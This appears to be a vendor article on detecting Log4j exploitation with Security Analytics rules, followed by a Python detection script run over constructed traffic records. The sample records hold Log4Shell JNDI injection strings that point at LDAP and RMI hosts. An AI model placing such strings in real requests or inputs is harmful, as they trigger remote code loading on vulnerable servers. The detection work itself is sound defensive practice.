With the details of the Log4j vulnerability published in late 2021, analysts are interested in using Security Analytics to detect whether they have been compromised through the Log4j vulnerability. Fortunately, Security Analytics itself is not vulnerable (see "Log4j2 vulnerability in Security Analytics?" for details).
There are multiple ways to use Security Analytics to detect possible infiltration through the Log4j vulnerability; the following are a few suggestions of what you could do and are by no means a comprehensive solution.
Log4j exploits typically carry the string "jndi" in the HTTP headers, so you could add a rule with http_uri~jndi or user_agent~jndi. The attack uses two flows. The first flow is the inbound request, where user_agent~jndi (or the http_uri match) would be present. The second flow is where the class files are downloaded. The first flow is much easier to detect, as the second flow appears to be carried over LDAP.
If you want to find .class files that were served over LDAP, create two indicators:
Indicator 1: log4j_ua_ext (or whatever name you prefer)
Indicator 2: log4j_ua_mime (or whatever name you prefer)
Create a rule named log4j_rule, add the two indicators above to it, and set the Type to Alert.
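The following is an added example, not part of the original article and not Security Analytics code, showing the same two-flow logic as plain detection code run over constructed sample records. It mirrors the first-flow rule (http_uri~jndi or user_agent~jndi) and the second-flow indicators (a .class file extension and a Java class MIME type, seen over LDAP). The field names proto, filename and mime, the MIME type list, and the assumption that the two indicators are alternatives within the rule are all assumptions; the sample records and addresses are constructed.

```python
import re

# Constructed sample records (not real traffic). http_uri and user_agent mirror
# the filter names in the article; proto, filename and mime are assumed names
# for the protocol, the served file name and the MIME type of the served file.
SAMPLE_RECORDS = [
    {"proto": "http", "http_uri": "/index.html",
     "user_agent": "Mozilla/5.0", "filename": "", "mime": "text/html"},
    {"proto": "http", "http_uri": "/login",
     "user_agent": "${jndi:ldap://203.0.113.10:1389/a}", "filename": "", "mime": "text/html"},
    {"proto": "http", "http_uri": "/search?q=${jndi:rmi://198.51.100.5/x}",
     "user_agent": "curl/7.68.0", "filename": "", "mime": "text/html"},
    {"proto": "ldap", "http_uri": "", "user_agent": "",
     "filename": "Exploit.class", "mime": "application/java-vm"},
    {"proto": "ldap", "http_uri": "", "user_agent": "",
     "filename": "payload", "mime": "application/java-vm"},
    # Served over HTTP, not LDAP: outside the scope of the second-flow rule.
    {"proto": "http", "http_uri": "/static/App.class",
     "user_agent": "Java/1.8.0_181", "filename": "App.class", "mime": "application/java-vm"},
]

# Case-insensitive substring match; the ~ operator in the article's rule is
# assumed here to behave like a case-insensitive "contains".
JNDI = re.compile(r"jndi", re.IGNORECASE)

# MIME types commonly used to label Java class files (assumption: adjust this
# to whatever label your sensor actually assigns to .class content).
CLASS_MIME_TYPES = {"application/java-vm", "application/x-java-class", "application/java"}


def flow1_match(rec):
    """First flow: http_uri~jndi OR user_agent~jndi on the inbound request."""
    return bool(JNDI.search(rec.get("http_uri", "")) or
                JNDI.search(rec.get("user_agent", "")))


def flow2_match(rec):
    """Second flow: a class file served over LDAP.

    log4j_ua_ext  -> file name ends in .class
    log4j_ua_mime -> MIME type is a Java class type
    Assumption: the rule fires when either indicator matches.
    """
    if rec.get("proto") != "ldap":
        return False
    ext_hit = rec.get("filename", "").lower().endswith(".class")   # log4j_ua_ext
    mime_hit = rec.get("mime", "").lower() in CLASS_MIME_TYPES      # log4j_ua_mime
    return ext_hit or mime_hit


def classify(records):
    """Return (index, flow) for every record that would raise the alert."""
    hits = []
    for i, rec in enumerate(records):
        if flow1_match(rec):
            hits.append((i, "flow1-jndi-header"))
        elif flow2_match(rec):
            hits.append((i, "flow2-class-over-ldap"))
    return hits


if __name__ == "__main__":
    for idx, flow in classify(SAMPLE_RECORDS):
        print(f"record {idx}: {flow}")
```

Running the script flags records 1 and 2 (jndi in the User-Agent and in the URI respectively) and records 3 and 4 (class content over LDAP, one by extension and one by MIME type only); record 5 is not flagged because the class file was served over HTTP, which is the caveat the article's "served from ldap" wording implies. The substring match on "jndi" alone is deliberately simple and will also match benign traffic that happens to contain the string, so expect to tune it against your own baseline before setting the Type to Alert.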